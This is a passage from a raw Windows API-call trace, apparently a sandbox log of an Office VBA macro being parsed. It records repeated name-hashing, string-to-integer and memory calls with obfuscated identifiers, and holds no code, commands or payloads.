dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] VarI4FromStr (in: strIn="938253115", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.885] VarI4FromStr (in: strIn="281897504", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] VarI4FromStr (in: strIn="485929699", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.885] VarI4FromStr (in: strIn="513769388", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lxwUCZAU") returned 0x1063c7 [0067.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.885] VarI4FromStr (in: strIn="565528095", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nBADUA_") returned 0x108b8c [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="t1AAZ_Ao") returned 0x108362 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qAXABC") returned 0x108426 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UG_AxAQ") returned 0x108bca [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAAQoBAD") returned 0x106f36 [0067.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.885] VarI4FromStr (in: strIn="371865346", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Y_AAAAUA") returned 0x10c006 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BAxwAZU") returned 0x1021fd [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bk4DQBwQ") returned 0x10e597 [0067.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.886] VarI4FromStr (in: strIn="946609376", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="178890498", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="30735772", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="275146983", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="462231146", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vCZADoA") returned 0x102680 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WA4k1A") returned 0x105c48 [0067.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.886] VarI4FromStr (in: strIn="89405622", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="770502107", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qQoDAAw") returned 0x10272a [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.886] VarI4FromStr (in: strIn="369458043", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="461774580", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.886] VarI4FromStr (in: strIn="132670754", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] VarI4FromStr (in: strIn="277847455", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.886] VarI4FromStr (in: strIn="281933474", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAZcADc") returned 0x108567 [0067.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.886] VarI4FromStr (in: strIn="790423096", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iDcD_ZD") returned 0x10debc [0067.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I1_w1DB") returned 0x10121e [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pAcAc4AA") returned 0x10e309 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q_DUBB") returned 0x1096dd [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.887] VarI4FromStr (in: strIn="485720081", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uxBDAA") returned 0x100dcc [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RUAkAQB") returned 0x102921 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQXDZXo") returned 0x100835 [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.887] VarI4FromStr (in: strIn="42550456", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="147429908", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="128643177", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="54527781", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="916611834", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qA_1QwA") returned 0x108770 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HkBADoD") returned 0x10c144 [0067.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.887] VarI4FromStr (in: strIn="665596688", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="516138675", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FUDAUBG") returned 0x10a166 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.887] VarI4FromStr (in: strIn="306056455", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="595185431", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.887] VarI4FromStr (in: strIn="911341055", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] VarI4FromStr (in: strIn="768030895", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.887] VarI4FromStr (in: strIn="543530327", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAcZAU_X") returned 0x104317 [0067.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.888] VarI4FromStr (in: strIn="400837893", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="v1AAQ_") returned 0x1016b6 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LQUGcA") returned 0x100051 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="X1oAAk") returned 0x10111f [0067.888] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="zcAXXAU", cchCount1=-1, lpString2="X1oAAk", cchCount2=-1) returned 3 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="o1QwAADG") returned 0x10f5a8 [0067.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.888] VarI4FromStr (in: strIn="403881230", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LAkA1B") returned 0x10065f [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f_AAAUA") returned 0x10665f [0067.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAcUBG") returned 0x10293c [0067.888] IMalloc:Realloc (This=0x7fefec05380, pv=0x694fee0, cb=0xc0) returned 0x6821210 [0067.888] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ba0000 [0067.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.889] VarI4FromStr (in: strIn="158201876", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="930574368", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="341893677", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="333153977", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="912624463", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAxAxcA") returned 0x10d08a [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LUBQZUA") returned 0x107442 [0067.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.889] VarI4FromStr (in: strIn="801524729", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="520346078", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zQDc4U") returned 0x100611 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.889] VarI4FromStr (in: strIn="476141456", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="973538102", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.889] VarI4FromStr (in: strIn="110498315", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] VarI4FromStr (in: strIn="940020379", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.889] VarI4FromStr (in: strIn="522216806", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JQAkAG_") returned 0x10deae [0067.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.890] VarI4FromStr (in: strIn="747867151", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F1kAAA") returned 0x106210 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oBABoUAQ") returned 0x1082c3 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PDUxAAAx") returned 0x1008e2 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hXZDZU") returned 0x1072c8 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oAkxUB") returned 0x10cab4 [0067.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.890] VarI4FromStr (in: strIn="15007405", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KBXQAc") returned 0x10e35a [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PQQA4A_") returned 0x106d1e [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CUDUZwC") returned 0x1078e5 [0067.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.890] VarI4FromStr (in: strIn="964587395", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] VarI4FromStr (in: strIn="24663956", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] VarI4FromStr (in: strIn="278539075", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] VarI4FromStr (in: strIn="883172913", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] VarI4FromStr (in: strIn="266507974", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ABDBAA") returned 0x103eb1 [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JAQw4AAA") returned 0x10d4b3 [0067.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.890] VarI4FromStr (in: strIn="914425838", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.890] VarI4FromStr (in: strIn="626335954", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="c1DBUAwA") returned 0x10e422 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.891] VarI4FromStr (in: strIn="878387139", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] VarI4FromStr (in: strIn="712896499", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.891] VarI4FromStr (in: strIn="894525131", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] VarI4FromStr (in: strIn="345874379", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.891] VarI4FromStr (in: strIn="343360274", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sw_AoD1") returned 0x1030c2 [0067.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.891] VarI4FromStr (in: strIn="536941458", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="O4kABDA_") returned 0x10020b [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zXwAZx") returned 0x10e496 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GXQUB_AZ") returned 0x104415 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GQAU_Dx") returned 0x107f9f [0067.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.891] VarI4FromStr (in: strIn="343820351", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAG1DABC") returned 0x103344 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OQDBCAc") returned 0x10e216 [0067.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TUUAA_AZ") returned 0x10b495 [0067.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.891] VarI4FromStr (in: strIn="268628993", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="746774187", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="139026355", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="726703441", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="171825012", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mUZwDD4") returned 0x10be84 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="awAXAA") returned 0x10c98d [0067.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.892] VarI4FromStr (in: strIn="110861643", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="83281497", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uBU4wBD") returned 0x1052d7 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.892] VarI4FromStr (in: strIn="251986732", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="591320226", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.892] VarI4FromStr (in: strIn="215190186", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] VarI4FromStr (in: strIn="72771049", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.892] VarI4FromStr (in: strIn="872634889", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qBABAA") returned 0x1058b9 [0067.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.892] VarI4FromStr (in: strIn="713955494", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAwkDAQA") returned 0x105ad1 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rcxDADA") returned 0x10529a [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FZUAGA") returned 0x107a04 [0067.893] strcpy_s (in: _Dst=0x7fee3b5efc0, _DstSize=0x100, _Src="FZUAGA" | out: _Dst="FZUAGA") returned 0x0 [0067.893] LHashValOfNameSysA (syskind=0x3, 